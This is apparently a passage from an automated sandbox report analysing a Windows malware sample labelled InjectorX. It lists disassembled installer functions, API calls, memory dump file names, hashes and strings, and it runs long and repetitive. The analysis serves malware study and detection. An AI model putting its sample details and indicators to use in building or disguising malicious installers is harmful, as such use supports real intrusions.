                                            • ScreenToClient.USER32(?,?), ref: 00404BB7
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                            • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                            • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                            Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(?), ref: 00401DB6
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                            • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                            • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Calibri
                                            • API String ID: 3808545654-1409258342
                                            • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                            • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                            • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                            • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                            Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                            • MulDiv.KERNEL32(00074600,00000064,000F1E30), ref: 00402E20
                                            • wsprintfW.USER32 ref: 00402E30
                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                            • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                            • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                            • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                            Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                            • GlobalFree.KERNEL32(?), ref: 00402950
                                            • GlobalFree.KERNEL32(00000000), ref: 00402963
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                            • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                            • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                            • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                            Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                            • wsprintfW.USER32 ref: 00404B16
                                            • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$6B
                                            • API String ID: 3540041739-3884863406
                                            • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                            • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                            • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                            • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                            Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
                                            • lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidelstrlen
                                            • String ID: C:\Windows\Intragantes.geo$sarcoderma
                                            • API String ID: 3109718747-3933101654
                                            • Opcode ID: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                            • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                            • Opcode Fuzzy Hash: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                            • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                            Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D5D
                                            • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                            • DeleteObject.GDI32(00000000), ref: 00401DA8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                            • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                            • Opcode Fuzzy Hash: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                            • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                            Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3081826266
                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                            • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                            • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                            Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                            • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                            • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                            • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                            Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405253
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                            • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                            • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                            • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                            Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                            • GlobalFree.KERNEL32(?), ref: 004038E6
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3081826266
                                            • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                            • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                            • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                            • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                            Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
